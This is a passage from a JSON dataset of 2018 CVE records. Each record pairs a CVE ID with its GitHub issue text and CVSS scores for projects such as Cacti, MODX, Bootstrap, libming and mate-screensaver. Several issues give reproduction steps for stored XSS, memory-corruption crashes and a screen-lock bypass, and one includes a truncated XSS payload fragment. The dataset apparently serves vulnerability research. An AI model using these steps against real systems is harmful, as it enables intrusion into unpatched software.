  30241. "CVE_ID": "CVE-2018-20591",
  30242. "Issue_Url_old": "https://github.com/libming/libming/issues/168",
  30243. "Issue_Url_new": "https://github.com/libming/libming/issues/168",
  30244. "Repo_new": "libming/libming",
  30245. "Issue_Created_At": "2018-12-20T07:03:46Z",
  30246. "description": "Heap buffer overflow problem in APITAG function in util/decompile.c of libming NUMBERTAG Hi, there. A Heap buffer overflow problem was discovered in APITAG function in util/decompile.c of libming NUMBERTAG This problem can be reproduced in the latest code base, too. A crafted input can cause segmentation faults and I have confirmed them with address sanitizer too. Here is the POC file. Please use the \"./swftocxx $POC /dev/null\" to reproduce the bug. FILETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  30247. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30248. "severity": "MEDIUM",
  30249. "baseScore": 6.5,
  30250. "impactScore": 3.6,
  30251. "exploitabilityScore": 2.8
  30252. },
  30253. {
  30254. "CVE_ID": "CVE-2018-20592",
  30255. "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/237",
  30256. "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/237",
  30257. "Repo_new": "michaelrsweet/mxml",
  30258. "Issue_Created_At": "2018-12-13T05:48:57Z",
  30259. "description": "Multiple crashes when running xmldoc. We detected several crashes with our fuzzer when mxml is compiled with APITAG including buffer overflow (heap based or stack based), and use after free. POCs (files ending with APITAG ) and error messages (files ending with APITAG ) are put inside this directory URLTAG . The triggering command is APITAG (w/o setting xml, POC is the \"source file\").",
  30260. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30261. "severity": "MEDIUM",
  30262. "baseScore": 5.5,
  30263. "impactScore": 3.6,
  30264. "exploitabilityScore": 1.8
  30265. },
  30266. {
  30267. "CVE_ID": "CVE-2018-20594",
  30268. "Issue_Url_old": "https://github.com/hs-web/hsweb-framework/issues/107",
  30269. "Issue_Url_new": "https://github.com/hs-web/hsweb-framework/issues/107",
  30270. "Repo_new": "hs-web/hsweb-framework",
  30271. "Issue_Created_At": "2018-12-29T02:57:09Z",
  30272. "description": "\u5b89\u5168\u95ee\u9898. \u60a8\u597d\uff1a APITAG framework\u4e2d\u5b58\u5728\u5982\u4e0b\u4e09\u4e2a\u5b89\u5168\u95ee\u9898\u3002 \u4e00\uff1a\u53cd\u5c04\u578bxss NUMBERTAG FILETAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG csrf NUMBERTAG FILETAG APITAG NUMBERTAG FILETAG PATHTAG NUMBERTAG",
  30273. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30274. "severity": "MEDIUM",
  30275. "baseScore": 6.1,
  30276. "impactScore": 2.7,
  30277. "exploitabilityScore": 2.8
  30278. },
  30279. {
  30280. "CVE_ID": "CVE-2018-20616",
  30281. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/4",
  30282. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/4",
  30283. "Repo_new": "brackeen/ok-file-formats",
  30284. "Issue_Created_At": "2018-12-31T11:53:39Z",
  30285. "description": "heap buffer overflow in ok file APITAG APITAG Test Version dev version, git clone FILETAG Test Program CODETAG Asan Debug Information ERRORTAG POC file CVETAG",
  30286. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30287. "severity": "HIGH",
  30288. "baseScore": 8.8,
  30289. "impactScore": 5.9,
  30290. "exploitabilityScore": 2.8
  30291. },
  30292. {
  30293. "CVE_ID": "CVE-2018-20617",
  30294. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/5",
  30295. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/5",
  30296. "Repo_new": "brackeen/ok-file-formats",
  30297. "Issue_Created_At": "2018-12-31T13:20:47Z",
  30298. "description": "heap buffer overflow in /ok file APITAG APITAG Test Version dev version, git clone FILETAG Test Program CODETAG $ gcc o csv_decode csv_decode.c ok_csv.h ok_csv.c Asan Debug Information ERRORTAG POC file CVETAG",
  30299. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30300. "severity": "HIGH",
  30301. "baseScore": 8.8,
  30302. "impactScore": 5.9,
  30303. "exploitabilityScore": 2.8
  30304. },
  30305. {
  30306. "CVE_ID": "CVE-2018-20618",
  30307. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/6",
  30308. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/6",
  30309. "Repo_new": "brackeen/ok-file-formats",
  30310. "Issue_Created_At": "2018-12-31T13:55:19Z",
  30311. "description": "heap buffer overflow in PATHTAG APITAG Test Version dev version, git clone FILETAG Test Program CODETAG $ gcc o mo_decode mo_decode.c ok_mo.h ok_mo.c Asan Debug Information ERRORTAG POC file CVETAG",
  30312. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30313. "severity": "HIGH",
  30314. "baseScore": 8.8,
  30315. "impactScore": 5.9,
  30316. "exploitabilityScore": 2.8
  30317. },
  30318. {
  30319. "CVE_ID": "CVE-2018-20652",
  30320. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/104",
  30321. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/104",
  30322. "Repo_new": "syoyo/tinyexr",
  30323. "Issue_Created_At": "2018-12-31T13:56:35Z",
  30324. "description": "Program crash due to Out of memory in function APITAG Hi, there. I test the program at the master branch. CODETAG An Out of Memory problem was discovered in function APITAG in tinyexr.h. The program tries to allocate with a large number size NUMBERTAG b NUMBERTAG b NUMBERTAG bytes) of memory. Program crash because of terminating called after throwing an instance of 'std::bad_alloc' Please use the \"./test_tinyexr $POC\" to reproduce the bug. FILETAG I will show you the output as follow. APITAG",
  30325. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30326. "severity": "MEDIUM",
  30327. "baseScore": 6.5,
  30328. "impactScore": 3.6,
  30329. "exploitabilityScore": 2.8
  30330. },
  30331. {
  30332. "CVE_ID": "CVE-2018-20659",
  30333. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/350",
  30334. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/350",
  30335. "Repo_new": "axiomatic-systems/bento4",
  30336. "Issue_Created_At": "2018-12-31T15:52:26Z",
  30337. "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash7.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
  30338. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30339. "severity": "MEDIUM",
  30340. "baseScore": 6.5,
  30341. "impactScore": 3.6,
  30342. "exploitabilityScore": 2.8
  30343. },
  30344. {
  30345. "CVE_ID": "CVE-2018-20663",
  30346. "Issue_Url_old": "https://github.com/cuba-platform/reports/issues/140",
  30347. "Issue_Url_new": "https://github.com/cuba-platform/reports/issues/140",
  30348. "Repo_new": "cuba-platform/reports",
  30349. "Issue_Created_At": "2018-12-21T13:58:43Z",
  30350. "description": "Permanent XSS attack through . APITAG Environment Platform version NUMBERTAG APITAG APITAG Client type: Web APITAG Browser: tested in Firefox and Chrome APITAG Description of the bug or enhancement Login and navigate to APITAG > Reports_ Click APITAG > New_ In the name field, type ERRORTAG Click APITAG and close_ Edit the newly created report by double click or click & Edit Hover mouse over the tab with the text APITAG report \"<img src=x o..._ FILETAG Expected behavior: nothing happens Actual behavior: javascript code is executed FILETAG",
  30351. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  30352. "severity": "MEDIUM",
  30353. "baseScore": 5.4,
  30354. "impactScore": 2.7,
  30355. "exploitabilityScore": 2.3
  30356. },
  30357. {
  30358. "CVE_ID": "CVE-2018-20676",
  30359. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/27044",
  30360. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/27044",
  30361. "Repo_new": "twbs/bootstrap",
  30362. "Issue_Created_At": "2018-08-10T09:04:03Z",
  30363. "description": "tooltip XSS on data viewport attribute. found in bootstrap NUMBERTAG APITAG \" APITAG over me APITAG URLTAG Win NUMBERTAG Chrome NUMBERTAG Firefo NUMBERTAG Bit)",
  30364. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30365. "severity": "MEDIUM",
  30366. "baseScore": 6.1,
  30367. "impactScore": 2.7,
  30368. "exploitabilityScore": 2.8
  30369. },
  30370. {
  30371. "CVE_ID": "CVE-2018-20677",
  30372. "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/27045",
  30373. "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/27045",
  30374. "Repo_new": "twbs/bootstrap",
  30375. "Issue_Created_At": "2018-08-10T09:07:08Z",
  30376. "description": "affix XSS on target config. found in bootstrap NUMBERTAG ERRORTAG URLTAG Win NUMBERTAG Chrome NUMBERTAG Firefo NUMBERTAG Bit)",
  30377. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30378. "severity": "MEDIUM",
  30379. "baseScore": 6.1,
  30380. "impactScore": 2.7,
  30381. "exploitabilityScore": 2.8
  30382. },
  30383. {
  30384. "CVE_ID": "CVE-2018-20680",
  30385. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/22",
  30386. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/22",
  30387. "Repo_new": "philippe/frogcms",
  30388. "Issue_Created_At": "2018-12-31T07:53:42Z",
  30389. "description": "Frog CMS NUMBERTAG has xss in PATHTAG body field. Frog CMS NUMBERTAG has xss in PATHTAG body field NUMBERTAG login APITAG exp ERRORTAG FILETAG NUMBERTAG save and close NUMBERTAG open FILETAG FILETAG",
  30390. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  30391. "severity": "MEDIUM",
  30392. "baseScore": 4.8,
  30393. "impactScore": 2.7,
  30394. "exploitabilityScore": 1.7
  30395. },
  30396. {
  30397. "CVE_ID": "CVE-2018-20681",
  30398. "Issue_Url_old": "https://github.com/mate-desktop/mate-screensaver/issues/170",
  30399. "Issue_Url_new": "https://github.com/mate-desktop/mate-screensaver/issues/170",
  30400. "Repo_new": "mate-desktop/mate-screensaver",
  30401. "Issue_Created_At": "2018-09-14T04:52:26Z",
  30402. "description": "Lock Screen not working after monitor plugged / unplugged (need to restart mate screensaver). Expected behaviour When the monitor is plugged / unplugged, Lock Screen should work like before Actual behaviour When the monitor is plugged / unplugged, Lock Screen does not work unless I restart mate screensaver Steps to reproduce the behaviour Login to MATE with a laptop while external monitor is attached via HDMI Select from menu: System > Lock Screen > It works, now we unlock the screen Unplug the HDMI cable Select from menu: System > Lock Screen > nothing happens Run APITAG Select from menu: System > Lock Screen > It works again MATE general version NUMBERTAG Package version mate screensaver NUMBERTAG Linux Distribution Linux Mint NUMBERTAG Tara Link to downstream report of your Distribution",
  30403. "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  30404. "severity": "MEDIUM",
  30405. "baseScore": 6.1,
  30406. "impactScore": 5.2,
  30407. "exploitabilityScore": 0.9
  30408. },
  30409. {
  30410. "CVE_ID": "CVE-2018-20681",
  30411. "Issue_Url_old": "https://github.com/mate-desktop/mate-screensaver/issues/155",
  30412. "Issue_Url_new": "https://github.com/mate-desktop/mate-screensaver/issues/155",
  30413. "Repo_new": "mate-desktop/mate-screensaver",
  30414. "Issue_Created_At": "2018-05-01T20:44:51Z",
  30415. "description": "mate screensaver screen lock can be bypassed by power cycling monitor. Expected behaviour Lock Screen Turn off monitor Turn monitor on Start typing Expect to see lock screen on monitor Actual behaviour Lock Screen Turn off monitor Turn monitor on Start typing Expect to see lock screen on monitor Steps to reproduce the behaviour CODETAG Wait NUMBERTAG seconds Lock screen (I used Window manager shortcut) Wait NUMBERTAG seconds Power off monitor (soft off) Wait NUMBERTAG seconds Power on monitor Wait NUMBERTAG seconds (that's how long it takes monitor to boot) Can see and use PATHTAG it is (effectively) unlocked. Notes/logs: APITAG reports: after APITAG Screensaver is not running! ERRORTAG The screensaver is inactive APITAG The screensaver is not inhibited APITAG The screensaver is active APITAG The screensaver is not inhibited APITAG mate screensaver no daemon debug` FILETAG Wait NUMBERTAG seconds Lock screen (I used Window manager shortcut) FILETAG Wait NUMBERTAG seconds Power off monitor (soft off) FILETAG FILETAG Wait NUMBERTAG seconds Power on monitor FILETAG FILETAG Wait NUMBERTAG seconds (that's how long it takes monitor to boot) Can see and use PATHTAG it is (effectively) unlocked. FILETAG (there is no FILETAG or FILETAG or FILETAG (blank during that time)) Troubleshooting This occurred on two machines. Home Machine Problem occurred on Ubuntu NUMBERTAG do not have logs unfortunately) Unsure what version of mate it was at the time If relevant monitor was NUMBERTAG Uses nvidia drivers Upgrading to Ubuntu NUMBERTAG which upgraded mate to NUMBERTAG fixed the problem on home machine. Work Machine Problem occurred on Ubuntu NUMBERTAG mate NUMBERTAG do not have logs unfortunately) Upgrading to Ubuntu NUMBERTAG mate NUMBERTAG did NOT fix the problem. If relevant monitor is NUMBERTAG Problem still occurs if I switch to different resolution Has no dedicated video card/using intel onboard graphics monitor is a USB hub.. problem still reproduces if I disconnect the usb cable and have the keyboard connected some other way. Please let me know what other logs/steps may be useful. MATE general version NUMBERTAG Package version mate screensaver NUMBERTAG See attached FILETAG for full list of all mate related package versions Linux Distribution Ubuntu NUMBERTAG",
  30416. "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  30417. "severity": "MEDIUM",
  30418. "baseScore": 6.1,
  30419. "impactScore": 5.2,
  30420. "exploitabilityScore": 0.9
  30421. },
  30422. {
  30423. "CVE_ID": "CVE-2018-20681",
  30424. "Issue_Url_old": "https://github.com/mate-desktop/mate-screensaver/issues/152",
  30425. "Issue_Url_new": "https://github.com/mate-desktop/mate-screensaver/issues/152",
  30426. "Repo_new": "mate-desktop/mate-screensaver",
  30427. "Issue_Created_At": "2018-04-10T19:53:17Z",
  30428. "description": "mate screensaver does not maintain user lockout / screen lock under certain conditions. Expected behaviour mate screensaver should keep the user's session locked until valid authentication has taken place (password entered, etc.) Actual behaviour & steps to reproduce the behaviour Do the following NUMBERTAG Have two display port attached displays on a fresh install of Fedora NUMBERTAG Mine are in ports NUMBERTAG in case that makes any difference. Login to MATE NUMBERTAG Press ctrl alt L or allow the screensaver timeout to lock the screen NUMBERTAG a. Bump the mouse or type a key on the keyboard before the displays have either been placed into power save mode or put to sleep: < MATE presents the password prompt and the user's windows remain hidden until the password has been correctly entered NUMBERTAG b. Bump the mouse or type a key on the keyboard after the displays have been put into power save mode, but before they have been put to sleep: < MATE presents the unlock with password prompt, but displays (doesn't hide) the windows of your desktop. You cannot interact with the applications or windows until the password has been correctly entered, but the content is plainly visible as described by other users in this bug NUMBERTAG c. Bump the mouse to type a key on the keyboard after the displays have been put to sleep: < MATE blanks one display where the password dialog box would have been, the other is available for interaction WITHOUT having entered in the correct password. New applications can be launched, all applications may be used with the same privilege level of the user who had previously logged in and believed that their desktop was locked. > MATE general version NUMBERTAG Package version CODETAG Linux Distribution Fedora NUMBERTAG Link to downstream report of your Distribution I may have to open a new bug with Fedora / RH since I didn't open this one originally > CVETAG",
  30429. "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  30430. "severity": "MEDIUM",
  30431. "baseScore": 6.1,
  30432. "impactScore": 5.2,
  30433. "exploitabilityScore": 0.9
  30434. },
  30435. {
  30436. "CVE_ID": "CVE-2018-20723",
  30437. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2215",
  30438. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2215",
  30439. "Repo_new": "cacti/cacti",
  30440. "Issue_Created_At": "2018-12-16T05:07:28Z",
  30441. "description": "Stored XSS in APITAG field Color . Description There's no escape being done before printing out the value of Name in the Color Template page. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Name field value. Payload ERRORTAG Visit URLTAG the payload will be triggered. APITAG APITAG APITAG",
  30442. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  30443. "severity": "MEDIUM",
  30444. "baseScore": 4.8,
  30445. "impactScore": 2.7,
  30446. "exploitabilityScore": 1.7
  30447. },
  30448. {
  30449. "CVE_ID": "CVE-2018-20724",
  30450. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2212",
  30451. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2212",
  30452. "Repo_new": "cacti/cacti",
  30453. "Issue_Created_At": "2018-12-15T11:31:18Z",
  30454. "description": "Stored XSS in APITAG Hostname\" field. Description There's no escape being done before printing out the value of Hostname value in the Data collectors table. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Hostname field value. Payload ERRORTAG Visit FILETAG payload will be triggered. APITAG APITAG APITAG",
  30455. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  30456. "severity": "MEDIUM",
  30457. "baseScore": 4.8,
  30458. "impactScore": 2.7,
  30459. "exploitabilityScore": 1.7
  30460. },
  30461. {
  30462. "CVE_ID": "CVE-2018-20725",
  30463. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2214",
  30464. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2214",
  30465. "Repo_new": "cacti/cacti",
  30466. "Issue_Created_At": "2018-12-16T05:03:25Z",
  30467. "description": "Stored XSS in APITAG Label\" field Graph. Description There's no escape being done before printing out the value of Vertical Label in the Graphic templates page. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Vertical label field value. Payload ERRORTAG Visit FILETAG the payload will be triggered. APITAG APITAG APITAG",
  30468. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  30469. "severity": "MEDIUM",
  30470. "baseScore": 4.8,
  30471. "impactScore": 2.7,
  30472. "exploitabilityScore": 1.7
  30473. },
  30474. {
  30475. "CVE_ID": "CVE-2018-20726",
  30476. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2213",
  30477. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2213",
  30478. "Repo_new": "cacti/cacti",
  30479. "Issue_Created_At": "2018-12-16T04:56:37Z",
  30480. "description": "Stored XSS in APITAG Hostname\" field Data collectors . Description There's no escape being done before printing out the value of Hostname value in the Tree table. APITAG Cacti version NUMBERTAG APITAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Hostname field value. Payload ERRORTAG Visit URLTAG payload will be triggered. APITAG APITAG APITAG",
  30481. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  30482. "severity": "MEDIUM",
  30483. "baseScore": 5.4,
  30484. "impactScore": 2.7,
  30485. "exploitabilityScore": 2.3
  30486. },
  30487. {
  30488. "CVE_ID": "CVE-2018-20742",
  30489. "Issue_Url_old": "https://github.com/ucbrise/opaque/issues/66",
  30490. "Issue_Url_new": "https://github.com/mc2-project/opaque-sql/issues/66",
  30491. "Repo_new": "mc2-project/opaque-sql",
  30492. "Issue_Created_At": "2018-12-01T08:19:39Z",
  30493. "description": "Security: No boundary check on APITAG . CODETAG APITAG could be a pointer to memory in enclave. It could casue a arbitrary memory write in enclave. Fix\uff1a Add a wrapper function of APITAG , checking the returned value with APITAG / sgx_is_outside_enclave . There is a sample below. ERRORTAG",
  30494. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  30495. "severity": "HIGH",
  30496. "baseScore": 7.5,
  30497. "impactScore": 3.6,
  30498. "exploitabilityScore": 3.9
  30499. },
  30500. {
  30501. "CVE_ID": "CVE-2018-20743",
  30502. "Issue_Url_old": "https://github.com/mumble-voip/mumble/issues/3505",
  30503. "Issue_Url_new": "https://github.com/mumble-voip/mumble/issues/3505",
  30504. "Repo_new": "mumble-voip/mumble",
  30505. "Issue_Created_At": "2018-08-27T15:48:38Z",
  30506. "description": "Rate limiting of channel joins. Malicious clients that are rapidly muting/unmuting, switching channels or posting text Messages (couple hundred times per second) are able to cause server instabilities: the murmur server simply hangs after a few seconds. We suspect the sqlite database to be the bottleneck that causes this behavior, but have no way to verify this, as attacks occur irregulary and only lasts for short amounts of time. Is there a way to rate limit such requests? External processes via ICE are not working for this purpose, as the server locks up regardless.",
  30507. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  30508. "severity": "HIGH",
  30509. "baseScore": 7.5,
  30510. "impactScore": 3.6,
  30511. "exploitabilityScore": 3.9
  30512. },
  30513. {
  30514. "CVE_ID": "CVE-2018-20744",
  30515. "Issue_Url_old": "https://github.com/rs/cors/issues/55",
  30516. "Issue_Url_new": "https://github.com/rs/cors/issues/55",
  30517. "Repo_new": "rs/cors",
  30518. "Issue_Created_At": "2018-05-12T08:14:21Z",
  30519. "description": "CORS security: reflecting any origin header value when configured to is dangerous. When CORS policy is configured to APITAG \"), current go CORS handler will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past. Some similar security issues: URLTAG URLTAG Some related blog posts: FILETAG URLTAG",
  30520. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  30521. "severity": "MEDIUM",
  30522. "baseScore": 5.9,
  30523. "impactScore": 3.6,
  30524. "exploitabilityScore": 2.2
  30525. },
  30526. {
  30527. "CVE_ID": "CVE-2018-20745",
  30528. "Issue_Url_old": "https://github.com/yiisoft/yii2/issues/16193",
  30529. "Issue_Url_new": "https://github.com/yiisoft/yii2/issues/16193",
  30530. "Repo_new": "yiisoft/yii2",
  30531. "Issue_Created_At": "2018-04-29T14:01:17Z",
  30532. "description": "CORS security: reflecting any origin header value when configured to is dangerous. When CORS policy is configured to , current Yii2 CORS filter will actively convert it to reflect any Origin header value. This kind of behavior is dangerous and has caused many security problems in the past. Some similar security issues: URLTAG URLTAG URLTAG URLTAG Some related blog posts: FILETAG URLTAG URLTAG",
  30533. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  30534. "severity": "MEDIUM",
  30535. "baseScore": 5.9,
  30536. "impactScore": 3.6,
  30537. "exploitabilityScore": 2.2
  30538. },
  30539. {
  30540. "CVE_ID": "CVE-2018-20748",
  30541. "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/273",
  30542. "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/273",
  30543. "Repo_new": "libvnc/libvncserver",
  30544. "Issue_Created_At": "2018-12-13T10:37:17Z",
  30545. "description": "SECURITY: malloc((uint NUMBERTAG t)length NUMBERTAG is unsafe, especially on NUMBERTAG bit systems. The fixes for NUMBERTAG are incomplete, as I explained in: URLTAG APITAG fix appears to be to add casts to (uint NUMBERTAG t) before adding NUMBERTAG in those many APITAG calls. On platforms with larger than NUMBERTAG bit size_t, this should be sufficient against integer overflows since the sizes are read from NUMBERTAG bit protocol fields, but it isn't sufficient to prevent maliciously large memory allocation on the client by a rogue server. On a platform with NUMBERTAG bit size_t, this isn't even sufficient to prevent the integer overflows.\"",
  30546. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  30547. "severity": "CRITICAL",
  30548. "baseScore": 9.8,
  30549. "impactScore": 5.9,
  30550. "exploitabilityScore": 3.9
  30551. },
  30552. {
  30553. "CVE_ID": "CVE-2018-20755",
  30554. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14102",
  30555. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14102",
  30556. "Repo_new": "modxcms/revolution",
  30557. "Issue_Created_At": "2018-10-02T03:58:45Z",
  30558. "description": "Stored XSS: User Photo. Stored XSS: The application is vulnerable to stored XSS. Step to reproduce Under Manage > Users sources choose Create New User and enter the Xss Payload ERRORTAG in the User Photo field and click on save. The application renders the entered script and displays a pop up whenever the page is being visited by the user. Observed behavior The application processes the html tags or scripts and it is getting stored in the database. Expected behavior It should not accept any scripts or html tags. Environment MODX version:MODX Revolution NUMBERTAG pl",
  30559. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30560. "severity": "MEDIUM",
  30561. "baseScore": 6.1,
  30562. "impactScore": 2.7,
  30563. "exploitabilityScore": 2.8
  30564. },
  30565. {
  30566. "CVE_ID": "CVE-2018-20757",
  30567. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14104",
  30568. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14104",
  30569. "Repo_new": "modxcms/revolution",
  30570. "Issue_Created_At": "2018-10-02T04:10:21Z",
  30571. "description": "Stored XSS: extended user fields. Container name ERRORTAG Attribute name ERRORTAG",
  30572. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30573. "severity": "MEDIUM",
  30574. "baseScore": 6.1,
  30575. "impactScore": 2.7,
  30576. "exploitabilityScore": 2.8
  30577. },
  30578. {
  30579. "CVE_ID": "CVE-2018-20758",
  30580. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14103",
  30581. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14103",
  30582. "Repo_new": "modxcms/revolution",
  30583. "Issue_Created_At": "2018-10-02T04:04:29Z",
  30584. "description": "Stored XSS: User Settings. FILETAG",
  30585. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  30586. "severity": "MEDIUM",
  30587. "baseScore": 5.4,
  30588. "impactScore": 2.7,
  30589. "exploitabilityScore": 2.3
  30590. },
  30591. {
  30592. "CVE_ID": "CVE-2018-20760",
  30593. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1177",
  30594. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1177",
  30595. "Repo_new": "gpac/gpac",
  30596. "Issue_Created_At": "2018-12-13T10:41:00Z",
  30597. "description": "OOB issues of gf_text_get_utf8_line. In gf_text_get_utf8_line function, gf_utf8_wcstombs return NUMBERTAG with crafted srt file, it will cause APITAG NUMBERTAG out of bound write PATHTAG gdb APITAG GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from APITAG (gdb) set args add crafted.srt overview.mp4 (gdb) r Starting program: PATHTAG add crafted.srt overview.mp4 APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Program received signal SIGBUS, Bus error NUMBERTAG ffff NUMBERTAG b2eeb in gf_text_get_utf8_line APITAG NUMBERTAG APITAG txt_in NUMBERTAG c4e0, unicode_type NUMBERTAG at APITAG NUMBERTAG APITAG NUMBERTAG gdb) bt NUMBERTAG ffff NUMBERTAG b2eeb in gf_text_get_utf8_line APITAG NUMBERTAG APITAG txt_in NUMBERTAG c4e0, unicode_type NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG c6 in gf_text_import_srt (import NUMBERTAG fffffff NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG bd NUMBERTAG in gf_import_timed_text (import NUMBERTAG fffffff NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG in gf_media_import (importer NUMBERTAG fffffff NUMBERTAG at APITAG NUMBERTAG a in import_file (dest NUMBERTAG d NUMBERTAG APITAG APITAG import_flags NUMBERTAG force_fps NUMBERTAG frames_per_sample NUMBERTAG at APITAG NUMBERTAG bdac in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG e in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG (gdb)",
  30598. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30599. "severity": "HIGH",
  30600. "baseScore": 7.8,
  30601. "impactScore": 5.9,
  30602. "exploitabilityScore": 1.8
  30603. },
  30604. {
  30605. "CVE_ID": "CVE-2018-20761",
  30606. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1186",
  30607. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1186",
  30608. "Repo_new": "gpac/gpac",
  30609. "Issue_Created_At": "2018-12-22T02:44:19Z",
